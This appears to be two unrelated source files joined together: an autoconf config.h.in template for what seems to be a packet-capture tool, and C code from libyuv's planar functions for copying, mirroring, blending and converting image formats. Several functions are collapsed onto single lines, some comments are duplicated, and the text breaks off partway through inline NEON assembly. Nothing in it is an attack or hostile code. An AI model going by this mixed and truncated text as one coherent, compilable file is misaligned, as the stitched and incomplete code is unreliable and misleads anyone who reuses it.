/* config.h.in. Generated from configure.ac by autoheader. */ /* Define to 1 if you have the <dlfcn.h> header file. */ #undef HAVE_DLFCN_H /* Define to 1 if you have the `fork' function. */ #undef HAVE_FORK /* Define to 1 if you have the `gettimeofday' function. */ #undef HAVE_GETTIMEOFDAY /* no HEP support */ #undef HAVE_HEP /* Define to 1 if you have the <inttypes.h> header file. */ #undef HAVE_INTTYPES_H /* Define to 1 if you have the `dl' library (-ldl). */ #undef HAVE_LIBDL /* Define to 1 if you have the `nsl' library (-lnsl). */ #undef HAVE_LIBNSL /* Define to 1 if you have the `pcap' library (-lpcap). */ #undef HAVE_LIBPCAP /* Define to 1 if you have the `pthread' library (-lpthread). */ #undef HAVE_LIBPTHREAD /* Define to 1 if you have the `socket' library (-lsocket). */ #undef HAVE_LIBSOCKET /* Define to 1 if you have the `wpcap' library (-lwpcap). */ #undef HAVE_LIBWPCAP /* Define to 1 if your system has a GNU libc compatible `malloc' function, and to 0 otherwise. */ #undef HAVE_MALLOC /* Define to 1 if you have the <memory.h> header file. */ #undef HAVE_MEMORY_H /* Define to 1 if you have the `memset' function. */ #undef HAVE_MEMSET /* Define to 1 if you have the `select' function. */ #undef HAVE_SELECT /* Define to 1 if you have the `socket' function. */ #undef HAVE_SOCKET /* Define to 1 if you have the <stdint.h> header file. */ #undef HAVE_STDINT_H /* Define to 1 if you have the <stdlib.h> header file. */ #undef HAVE_STDLIB_H /* Define to 1 if you have the `strdup' function. */ #undef HAVE_STRDUP /* Define to 1 if you have the `strerror' function. */ #undef HAVE_STRERROR /* Define to 1 if you have the <strings.h> header file. */ #undef HAVE_STRINGS_H /* Define to 1 if you have the <string.h> header file. */ #undef HAVE_STRING_H /* Define to 1 if you have the `strndup' function. */ #undef HAVE_STRNDUP /* Define to 1 if you have the <sys/stat.h> header file. */ #undef HAVE_SYS_STAT_H /* Define to 1 if you have the <sys/types.h> header file. 
*/ #undef HAVE_SYS_TYPES_H /* Define to 1 if you have the <unistd.h> header file. */ #undef HAVE_UNISTD_H /* Define to 1 if you have the `vfork' function. */ #undef HAVE_VFORK /* Define to 1 if you have the <vfork.h> header file. */ #undef HAVE_VFORK_H /* Define to 1 if `fork' works. */ #undef HAVE_WORKING_FORK /* Define to 1 if `vfork' works. */ #undef HAVE_WORKING_VFORK /* Define to the sub-directory in which libtool stores uninstalled libraries. */ #undef LT_OBJDIR /* Define to 1 if Operating System is Darwin */ #undef OS_DARWIN /* Define to 1 if Operating System is FreeBSD */ #undef OS_FREEBSD /* Define to 1 if Operating System is Linux */ #undef OS_LINUX /* Define to 1 if Operating System is NETBSD */ #undef OS_NETBSD /* Define to 1 if Operating System is SOLARIS */ #undef OS_SOLARIS /* Name of package */ #undef PACKAGE /* Define to the address where bug reports for this package should be sent. */ #undef PACKAGE_BUGREPORT /* Define to the full name of this package. */ #undef PACKAGE_NAME /* Define to the full name and version of this package. */ #undef PACKAGE_STRING /* Define to the one symbol short name of this package. */ #undef PACKAGE_TARNAME /* Define to the home page for this package. */ #undef PACKAGE_URL /* Define to the version of this package. */ #undef PACKAGE_VERSION /* Define to 1 if you have the ANSI C header files. */ #undef STDC_HEADERS /* Use NCURSES library */ #undef USE_NCURSES /* Use PCRE library */ #undef USE_PCRE /* Use REDIS library */ #undef USE_REDIS /* Use OpenSSL SSL library */ #undef USE_SSL /* Use ZIP library */ #undef USE_ZLIB /* Version number of package */ #undef VERSION /* Define for Solaris 2.5.1 so the uint32_t typedef from <sys/synch.h>, <pthread.h>, or <semaphore.h> is not used. If the typedef were allowed, the #define below would cause a syntax error. */ #undef _UINT32_T /* Define for Solaris 2.5.1 so the uint8_t typedef from <sys/synch.h>, <pthread.h>, or <semaphore.h> is not used. 
If the typedef were allowed, the #define below would cause a syntax error. */ #undef _UINT8_T /* Define to the type of a signed integer type of width exactly 32 bits if such a type exists and the standard includes do not define it. */ #undef int32_t /* Define to the type of a signed integer type of width exactly 8 bits if such a type exists and the standard includes do not define it. */ #undef int8_t /* Define to rpl_malloc if the replacement function should be used. */ #undef malloc /* Define to `int' if <sys/types.h> does not define. */ #undef pid_t /* Define to the type of an unsigned integer type of width exactly 16 bits if such a type exists and the standard includes do not define it. */ #undef uint16_t /* Define to the type of an unsigned integer type of width exactly 32 bits if such a type exists and the standard includes do not define it. */ #undef uint32_t /* Define to the type of an unsigned integer type of width exactly 8 bits if such a type exists and the standard includes do not define it. */ #undef uint8_t /* Define as `fork' if `vfork' does not work. */ #undef vfork
{ "language": "C" }
/*
 *  Copyright (c) 2011 The LibYuv project authors. All Rights Reserved.
 *
 *  Use of this source code is governed by a BSD-style license
 *  that can be found in the LICENSE file in the root of the source
 *  tree. An additional intellectual property rights grant can be found
 *  in the file PATENTS. All contributing project authors may
 *  be found in the AUTHORS file in the root of the source tree.
 */

#include "libyuv/planar_functions.h"

#include <stdio.h>  // printf()
#include <string.h>  // for memset()

#include "libyuv/cpu_id.h"
#include "source/row.h"

#ifdef __cplusplus
namespace libyuv {
extern "C" {
#endif

// Copy a plane of 8-bit data, one row at a time.
// Picks the fastest qualifying row copier for this CPU. NOTE: the #if blocks
// below intentionally run in order of increasing preference — a later block
// that qualifies overwrites the pick of an earlier one (SSE2 > X86 > NEON > C).
void CopyPlane(const uint8* src_y, int src_stride_y,
               uint8* dst_y, int dst_stride_y,
               int width, int height) {
  void (*CopyRow)(const uint8* src, uint8* dst, int width) = CopyRow_C;
#if defined(HAS_COPYROW_NEON)
  // NEON path requires width to be a multiple of 64 bytes.
  if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 64)) {
    CopyRow = CopyRow_NEON;
  }
#endif
#if defined(HAS_COPYROW_X86)
  if (TestCpuFlag(kCpuHasX86) && IS_ALIGNED(width, 4)) {
    CopyRow = CopyRow_X86;
  }
#endif
#if defined(HAS_COPYROW_SSE2)
  // SSE2 path needs 16-byte aligned pointers and strides plus width % 32 == 0.
  if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 32) &&
      IS_ALIGNED(src_y, 16) && IS_ALIGNED(src_stride_y, 16) &&
      IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) {
    CopyRow = CopyRow_SSE2;
  }
#endif

  // Copy plane
  for (int y = 0; y < height; ++y) {
    CopyRow(src_y, dst_y, width);
    src_y += src_stride_y;
    dst_y += dst_stride_y;
  }
}

// Mirror a plane of data horizontally (left-right flip), one row at a time.
void MirrorPlane(const uint8* src_y, int src_stride_y,
                 uint8* dst_y, int dst_stride_y,
                 int width, int height) {
  void (*MirrorRow)(const uint8* src, uint8* dst, int width) = MirrorRow_C;
#if defined(HAS_MIRRORROW_NEON)
  if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16)) {
    MirrorRow = MirrorRow_NEON;
  }
#endif
#if defined(HAS_MIRRORROW_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 16)) {
    MirrorRow = MirrorRow_SSE2;
    // SSSE3 variant is nested inside the SSE2 branch: it additionally needs
    // a 16-byte aligned source pointer and stride.
#if defined(HAS_MIRRORROW_SSSE3)
    if (TestCpuFlag(kCpuHasSSSE3) &&
        IS_ALIGNED(src_y, 16) && IS_ALIGNED(src_stride_y, 16)) {
      MirrorRow = MirrorRow_SSSE3;
    }
#endif
  }
#endif

  // Mirror plane
  for (int y = 0; y < height; ++y) {
    MirrorRow(src_y, dst_y, width);
    src_y += src_stride_y;
    dst_y += dst_stride_y;
  }
}

// Mirror I420 horizontally, with optional vertical flip via negative height.
// Returns 0 on success, -1 on bad arguments. The Y plane copy is skipped when
// dst_y is NULL — note the argument check above already rejects NULL dst_y,
// so that guard is effectively redundant here.
int I420Mirror(const uint8* src_y, int src_stride_y,
               const uint8* src_u, int src_stride_u,
               const uint8* src_v, int src_stride_v,
               uint8* dst_y, int dst_stride_y,
               uint8* dst_u, int dst_stride_u,
               uint8* dst_v, int dst_stride_v,
               int width, int height) {
  if (!src_y || !src_u || !src_v || !dst_y || !dst_u || !dst_v ||
      width <= 0 || height == 0) {
    return -1;
  }
  // Negative height means invert the image: start at the bottom row of each
  // plane and walk upward with negated strides.
  if (height < 0) {
    height = -height;
    int halfheight = (height + 1) >> 1;
    src_y = src_y + (height - 1) * src_stride_y;
    src_u = src_u + (halfheight - 1) * src_stride_u;
    src_v = src_v + (halfheight - 1) * src_stride_v;
    src_stride_y = -src_stride_y;
    src_stride_u = -src_stride_u;
    src_stride_v = -src_stride_v;
  }
  // Chroma planes are half resolution in both dimensions (rounded up).
  int halfwidth = (width + 1) >> 1;
  int halfheight = (height + 1) >> 1;
  if (dst_y) {
    MirrorPlane(src_y, src_stride_y, dst_y, dst_stride_y, width, height);
  }
  MirrorPlane(src_u, src_stride_u, dst_u, dst_stride_u, halfwidth, halfheight);
  MirrorPlane(src_v, src_stride_v, dst_v, dst_stride_v, halfwidth, halfheight);
  return 0;
}

// Copy ARGB with optional flipping via negative height.
// Delegates to CopyPlane with width scaled by 4 bytes per pixel.
int ARGBCopy(const uint8* src_argb, int src_stride_argb,
             uint8* dst_argb, int dst_stride_argb,
             int width, int height) {
  if (!src_argb || !dst_argb || width <= 0 || height == 0) {
    return -1;
  }
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  CopyPlane(src_argb, src_stride_argb, dst_argb, dst_stride_argb,
            width * 4, height);
  return 0;
}

// Get a blender that is optimized for the CPU, alignment and pixel count.
// As there are 6 blenders to choose from, the caller should try to use
// the same blend function for all pixels if possible.
// Select the best ARGB blend row function for this CPU, the destination
// alignment, and the pixel count. Returns a function pointer of the
// ARGBBlendRow typedef (from row.h); the local variable deliberately shadows
// that typedef name. Selection order within each branch: scalar fallback,
// then "Any" (unaligned/odd-width) variant, then fully aligned variant.
ARGBBlendRow GetARGBBlend(uint8* dst_argb, int dst_stride_argb, int width) {
  void (*ARGBBlendRow)(const uint8* src_argb, const uint8* src_argb1,
                       uint8* dst_argb, int width) = ARGBBlendRow_C;
#if defined(HAS_ARGBBLENDROW_SSE2)
  if (TestCpuFlag(kCpuHasSSE2)) {
    ARGBBlendRow = ARGBBlendRow1_SSE2;  // 1-pixel-at-a-time SSE2 baseline.
    if (width >= 4) {
      ARGBBlendRow = ARGBBlendRow_Any_SSE2;
      if (IS_ALIGNED(width, 4) &&
          IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
        ARGBBlendRow = ARGBBlendRow_Aligned_SSE2;
      }
    }
  }
#endif
#if defined(HAS_ARGBBLENDROW_SSSE3)
  // SSSE3 block runs after SSE2 and overrides it when it qualifies.
  if (TestCpuFlag(kCpuHasSSSE3) && width >= 4) {
    ARGBBlendRow = ARGBBlendRow_Any_SSSE3;
    if (IS_ALIGNED(width, 4) &&
        IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
      ARGBBlendRow = ARGBBlendRow_Aligned_SSSE3;
    }
  }
#endif
  return ARGBBlendRow;
}

// Alpha Blend 2 ARGB images row by row and store to destination.
// Negative height inverts the output. Returns 0 on success, -1 on bad args.
int ARGBBlend(const uint8* src_argb0, int src_stride_argb0,
              const uint8* src_argb1, int src_stride_argb1,
              uint8* dst_argb, int dst_stride_argb,
              int width, int height) {
  if (!src_argb0 || !src_argb1 || !dst_argb || width <= 0 || height == 0) {
    return -1;
  }
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    dst_argb = dst_argb + (height - 1) * dst_stride_argb;
    dst_stride_argb = -dst_stride_argb;
  }
  void (*ARGBBlendRow)(const uint8* src_argb, const uint8* src_argb1,
                       uint8* dst_argb, int width) =
      GetARGBBlend(dst_argb, dst_stride_argb, width);

  for (int y = 0; y < height; ++y) {
    ARGBBlendRow(src_argb0, src_argb1, dst_argb, width);
    src_argb0 += src_stride_argb0;
    src_argb1 += src_stride_argb1;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

// Convert I422 to ARGB. Chroma is half width, full height, so the same
// U/V row pointers advance every output row (unlike I420).
int I422ToARGB(const uint8* src_y, int src_stride_y,
               const uint8* src_u, int src_stride_u,
               const uint8* src_v, int src_stride_v,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    dst_argb = dst_argb + (height - 1) * dst_stride_argb;
    dst_stride_argb = -dst_stride_argb;
  }
  void (*I420ToARGBRow)(const uint8* y_buf,
                        const uint8* u_buf,
                        const uint8* v_buf,
                        uint8* rgb_buf,
                        int width) = I420ToARGBRow_C;
#if defined(HAS_I420TOARGBROW_NEON)
  if (TestCpuFlag(kCpuHasNEON)) {
    I420ToARGBRow = I420ToARGBRow_Any_NEON;
    if (IS_ALIGNED(width, 16)) {
      I420ToARGBRow = I420ToARGBRow_NEON;
    }
  }
#elif defined(HAS_I420TOARGBROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) && width >= 8) {
    I420ToARGBRow = I420ToARGBRow_Any_SSSE3;
    if (IS_ALIGNED(width, 8) &&
        IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
      I420ToARGBRow = I420ToARGBRow_SSSE3;
    }
  }
#endif
  for (int y = 0; y < height; ++y) {
    I420ToARGBRow(src_y, src_u, src_v, dst_argb, width);
    dst_argb += dst_stride_argb;
    src_y += src_stride_y;
    src_u += src_stride_u;
    src_v += src_stride_v;
  }
  return 0;
}

// Convert I444 to ARGB. Chroma is full resolution; all three plane pointers
// advance every output row.
int I444ToARGB(const uint8* src_y, int src_stride_y,
               const uint8* src_u, int src_stride_u,
               const uint8* src_v, int src_stride_v,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    dst_argb = dst_argb + (height - 1) * dst_stride_argb;
    dst_stride_argb = -dst_stride_argb;
  }
  void (*I444ToARGBRow)(const uint8* y_buf,
                        const uint8* u_buf,
                        const uint8* v_buf,
                        uint8* rgb_buf,
                        int width) = I444ToARGBRow_C;
#if defined(HAS_I444TOARGBROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 8) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    I444ToARGBRow = I444ToARGBRow_SSSE3;
  }
#endif
  for (int y = 0; y < height; ++y) {
    I444ToARGBRow(src_y, src_u, src_v, dst_argb, width);
    dst_argb += dst_stride_argb;
    src_y += src_stride_y;
    src_u += src_stride_u;
    src_v += src_stride_v;
  }
  return 0;
}

// Convert I400 to ARGB.
// Convert I400 (grey Y plane) to ARGB — reference variant. Negative height
// inverts the *destination* (writes bottom-up), unlike I400ToARGB below,
// which walks the *source* bottom-up instead.
int I400ToARGB_Reference(const uint8* src_y, int src_stride_y,
                         uint8* dst_argb, int dst_stride_argb,
                         int width, int height) {
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    dst_argb = dst_argb + (height - 1) * dst_stride_argb;
    dst_stride_argb = -dst_stride_argb;
  }
  void (*YToARGBRow)(const uint8* y_buf,
                     uint8* rgb_buf,
                     int width) = YToARGBRow_C;
#if defined(HAS_YTOARGBROW_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) &&
      IS_ALIGNED(width, 8) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    YToARGBRow = YToARGBRow_SSE2;
  }
#endif
  for (int y = 0; y < height; ++y) {
    YToARGBRow(src_y, dst_argb, width);
    dst_argb += dst_stride_argb;
    src_y += src_stride_y;
  }
  return 0;
}

// Convert I400 to ARGB. Negative height inverts by reading the source
// bottom-up (source pointer starts at the last row, stride negated).
int I400ToARGB(const uint8* src_y, int src_stride_y,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  if (height < 0) {
    height = -height;
    src_y = src_y + (height - 1) * src_stride_y;
    src_stride_y = -src_stride_y;
  }
  void (*I400ToARGBRow)(const uint8* src_y, uint8* dst_argb, int pix) =
      I400ToARGBRow_C;
#if defined(HAS_I400TOARGBROW_SSE2)
  // Note: source only needs 8-byte alignment here; destination needs 16.
  if (TestCpuFlag(kCpuHasSSE2) &&
      IS_ALIGNED(width, 8) &&
      IS_ALIGNED(src_y, 8) && IS_ALIGNED(src_stride_y, 8) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    I400ToARGBRow = I400ToARGBRow_SSE2;
  }
#endif
  for (int y = 0; y < height; ++y) {
    I400ToARGBRow(src_y, dst_argb, width);
    src_y += src_stride_y;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

// Convert ABGR to ARGB (channel reorder). Negative height reads bottom-up.
int ABGRToARGB(const uint8* src_abgr, int src_stride_abgr,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  if (height < 0) {
    height = -height;
    src_abgr = src_abgr + (height - 1) * src_stride_abgr;
    src_stride_abgr = -src_stride_abgr;
  }
  void (*ABGRToARGBRow)(const uint8* src_abgr, uint8* dst_argb, int pix) =
      ABGRToARGBRow_C;
#if defined(HAS_ABGRTOARGBROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) &&
      IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_abgr, 16) && IS_ALIGNED(src_stride_abgr, 16) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    ABGRToARGBRow = ABGRToARGBRow_SSSE3;
  }
#endif

  for (int y = 0; y < height; ++y) {
    ABGRToARGBRow(src_abgr, dst_argb, width);
    src_abgr += src_stride_abgr;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

// Convert BGRA to ARGB (channel reorder). Negative height reads bottom-up.
int BGRAToARGB(const uint8* src_bgra, int src_stride_bgra,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  if (height < 0) {
    height = -height;
    src_bgra = src_bgra + (height - 1) * src_stride_bgra;
    src_stride_bgra = -src_stride_bgra;
  }
  void (*BGRAToARGBRow)(const uint8* src_bgra, uint8* dst_argb, int pix) =
      BGRAToARGBRow_C;
#if defined(HAS_BGRATOARGBROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) &&
      IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_bgra, 16) && IS_ALIGNED(src_stride_bgra, 16) &&
      IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
    BGRAToARGBRow = BGRAToARGBRow_SSSE3;
  }
#endif
  for (int y = 0; y < height; ++y) {
    BGRAToARGBRow(src_bgra, dst_argb, width);
    src_bgra += src_stride_bgra;
    dst_argb += dst_stride_argb;
  }
  return 0;
}

// Convert ARGB to I400 (extract luma plane). Negative height reads bottom-up.
int ARGBToI400(const uint8* src_argb, int src_stride_argb,
               uint8* dst_y, int dst_stride_y,
               int width, int height) {
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  void (*ARGBToYRow)(const uint8* src_argb, uint8* dst_y, int pix) =
      ARGBToYRow_C;
#if defined(HAS_ARGBTOYROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) &&
      IS_ALIGNED(width, 4) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) &&
      IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) {
    ARGBToYRow = ARGBToYRow_SSSE3;
  }
#endif

  for (int y = 0; y < height; ++y) {
    ARGBToYRow(src_argb, dst_y, width);
    src_argb += src_stride_argb;
    dst_y += dst_stride_y;
  }
  return 0;
}

// Convert RAW to ARGB.
int RAWToARGB(const uint8* src_raw, int src_stride_raw, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_raw = src_raw + (height - 1) * src_stride_raw; src_stride_raw = -src_stride_raw; } void (*RAWToARGBRow)(const uint8* src_raw, uint8* dst_argb, int pix) = RAWToARGBRow_C; #if defined(HAS_RAWTOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { RAWToARGBRow = RAWToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { RAWToARGBRow(src_raw, dst_argb, width); src_raw += src_stride_raw; dst_argb += dst_stride_argb; } return 0; } // Convert RGB24 to ARGB. int RGB24ToARGB(const uint8* src_rgb24, int src_stride_rgb24, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_rgb24 = src_rgb24 + (height - 1) * src_stride_rgb24; src_stride_rgb24 = -src_stride_rgb24; } void (*RGB24ToARGBRow)(const uint8* src_rgb24, uint8* dst_argb, int pix) = RGB24ToARGBRow_C; #if defined(HAS_RGB24TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { RGB24ToARGBRow = RGB24ToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { RGB24ToARGBRow(src_rgb24, dst_argb, width); src_rgb24 += src_stride_rgb24; dst_argb += dst_stride_argb; } return 0; } // Convert ARGB To RGB24. 
// Convert ARGB To RGB24 (drop alpha, pack 3 bytes/pixel).
// Negative height reads the source bottom-up.
int ARGBToRGB24(const uint8* src_argb, int src_stride_argb,
                uint8* dst_rgb24, int dst_stride_rgb24,
                int width, int height) {
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  void (*ARGBToRGB24Row)(const uint8* src_argb, uint8* dst_rgb, int pix) =
      ARGBToRGB24Row_C;
#if defined(HAS_ARGBTORGB24ROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16)) {
    // "Any" variant handles arbitrary widths but needs the internal row
    // buffer to fit: width * 3 output bytes must not exceed kMaxStride.
    if (width * 3 <= kMaxStride) {
      ARGBToRGB24Row = ARGBToRGB24Row_Any_SSSE3;
    }
    // Fully aligned variant overrides "Any" when everything qualifies.
    if (IS_ALIGNED(width, 16) &&
        IS_ALIGNED(dst_rgb24, 16) && IS_ALIGNED(dst_stride_rgb24, 16)) {
      ARGBToRGB24Row = ARGBToRGB24Row_SSSE3;
    }
  }
#endif

  for (int y = 0; y < height; ++y) {
    ARGBToRGB24Row(src_argb, dst_rgb24, width);
    src_argb += src_stride_argb;
    dst_rgb24 += dst_stride_rgb24;
  }
  return 0;
}

// Convert ARGB To RAW (drop alpha; RAW byte order). Same selection logic
// as ARGBToRGB24 above.
int ARGBToRAW(const uint8* src_argb, int src_stride_argb,
              uint8* dst_raw, int dst_stride_raw,
              int width, int height) {
  if (height < 0) {
    height = -height;
    src_argb = src_argb + (height - 1) * src_stride_argb;
    src_stride_argb = -src_stride_argb;
  }
  void (*ARGBToRAWRow)(const uint8* src_argb, uint8* dst_rgb, int pix) =
      ARGBToRAWRow_C;
#if defined(HAS_ARGBTORAWROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) &&
      IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16)) {
    if (width * 3 <= kMaxStride) {
      ARGBToRAWRow = ARGBToRAWRow_Any_SSSE3;
    }
    if (IS_ALIGNED(width, 16) &&
        IS_ALIGNED(dst_raw, 16) && IS_ALIGNED(dst_stride_raw, 16)) {
      ARGBToRAWRow = ARGBToRAWRow_SSSE3;
    }
  }
#endif

  for (int y = 0; y < height; ++y) {
    ARGBToRAWRow(src_argb, dst_raw, width);
    src_argb += src_stride_argb;
    dst_raw += dst_stride_raw;
  }
  return 0;
}

// Convert NV12 to ARGB. NV12 stores interleaved UV at half resolution; each
// UV row is split into planar U and V scratch rows once per output-row pair
// and fed to the planar I420 row converter.
int NV12ToARGB(const uint8* src_y, int src_stride_y,
               const uint8* src_uv, int src_stride_uv,
               uint8* dst_argb, int dst_stride_argb,
               int width, int height) {
  // Negative height means invert the image.
  if (height < 0) {
    height = -height;
    dst_argb = dst_argb + (height - 1) * dst_stride_argb;
    dst_stride_argb = -dst_stride_argb;
  }
  void (*I420ToARGBRow)(const uint8* y_buf,
                        const uint8* u_buf,
                        const uint8* v_buf,
                        uint8* argb_buf,
                        int width) = I420ToARGBRow_C;
#if defined(HAS_I420TOARGBROW_NEON)
  if (TestCpuFlag(kCpuHasNEON)) {
    I420ToARGBRow = I420ToARGBRow_Any_NEON;
    if (IS_ALIGNED(width, 16)) {
      I420ToARGBRow = I420ToARGBRow_NEON;
    }
  }
#elif defined(HAS_I420TOARGBROW_SSSE3)
  if (TestCpuFlag(kCpuHasSSSE3) && width >= 8) {
    I420ToARGBRow = I420ToARGBRow_Any_SSSE3;
    if (IS_ALIGNED(width, 8) &&
        IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) {
      I420ToARGBRow = I420ToARGBRow_SSSE3;
    }
  }
#endif

  int halfwidth = (width + 1) >> 1;
  void (*SplitUV)(const uint8* src_uv, uint8* dst_u, uint8* dst_v, int pix) =
      SplitUV_C;
#if defined(HAS_SPLITUV_NEON)
  if (TestCpuFlag(kCpuHasNEON)) {
    SplitUV = SplitUV_NEON;
  }
#elif defined(HAS_SPLITUV_SSE2)
  if (TestCpuFlag(kCpuHasSSE2) &&
      IS_ALIGNED(src_uv, 16) && IS_ALIGNED(src_stride_uv, 16)) {
    SplitUV = SplitUV_SSE2;
  }
#endif

  // Scratch: first kMaxStride bytes hold U, second kMaxStride bytes hold V.
  SIMD_ALIGNED(uint8 rowuv[kMaxStride * 2]);

  for (int y = 0; y < height; ++y) {
    if ((y & 1) == 0) {
      // Copy a row of UV. Chroma is vertically subsampled 2:1, so a new UV
      // row is consumed only on even output rows.
      SplitUV(src_uv, rowuv, rowuv + kMaxStride, halfwidth);
      src_uv += src_stride_uv;
    }
    I420ToARGBRow(src_y, rowuv, rowuv + kMaxStride, dst_argb, width);
    dst_argb += dst_stride_argb;
    src_y += src_stride_y;
  }
  return 0;
}

// Convert NV12 to RGB565. Converts to ARGB in a scratch row, then packs
// that row to RGB565.
int NV12ToRGB565(const uint8* src_y, int src_stride_y,
                 const uint8* src_uv, int src_stride_uv,
                 uint8* dst_rgb, int dst_stride_rgb,
                 int width, int height) {
  // Negative height means invert the image.
if (height < 0) { height = -height; dst_rgb = dst_rgb + (height - 1) * dst_stride_rgb; dst_stride_rgb = -dst_stride_rgb; } void (*I420ToARGBRow)(const uint8* y_buf, const uint8* u_buf, const uint8* v_buf, uint8* rgb_buf, int width) = I420ToARGBRow_C; #if defined(HAS_I420TOARGBROW_NEON) if (TestCpuFlag(kCpuHasNEON)) { I420ToARGBRow = I420ToARGBRow_NEON; } #elif defined(HAS_I420TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3)) { I420ToARGBRow = I420ToARGBRow_SSSE3; } #endif SIMD_ALIGNED(uint8 row[kMaxStride]); void (*ARGBToRGB565Row)(const uint8* src_argb, uint8* dst_rgb, int pix) = ARGBToRGB565Row_C; #if defined(HAS_ARGBTORGB565ROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4)) { ARGBToRGB565Row = ARGBToRGB565Row_SSE2; } #endif int halfwidth = (width + 1) >> 1; void (*SplitUV)(const uint8* src_uv, uint8* dst_u, uint8* dst_v, int pix) = SplitUV_C; #if defined(HAS_SPLITUV_NEON) if (TestCpuFlag(kCpuHasNEON)) { SplitUV = SplitUV_NEON; } #elif defined(HAS_SPLITUV_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(src_uv, 16) && IS_ALIGNED(src_stride_uv, 16)) { SplitUV = SplitUV_SSE2; } #endif SIMD_ALIGNED(uint8 rowuv[kMaxStride * 2]); for (int y = 0; y < height; ++y) { if ((y & 1) == 0) { // Copy a row of UV. SplitUV(src_uv, rowuv, rowuv + kMaxStride, halfwidth); src_uv += src_stride_uv; } I420ToARGBRow(src_y, rowuv, rowuv + kMaxStride, row, width); ARGBToRGB565Row(row, dst_rgb, width); dst_rgb += dst_stride_rgb; src_y += src_stride_y; } return 0; } // SetRow8 writes 'count' bytes using a 32 bit value repeated // SetRow32 writes 'count' words using a 32 bit value repeated #if !defined(YUV_DISABLE_ASM) && defined(__ARM_NEON__) #define HAS_SETROW_NEON static void SetRow8_NEON(uint8* dst, uint32 v32, int count) { asm volatile ( "vdup.u32 q0, %2 \n" // duplicate 4 ints "1: \n" "subs %1, %1, #16 \n" // 16 bytes per loop "vst1.u32 {q0}, [%0]! 
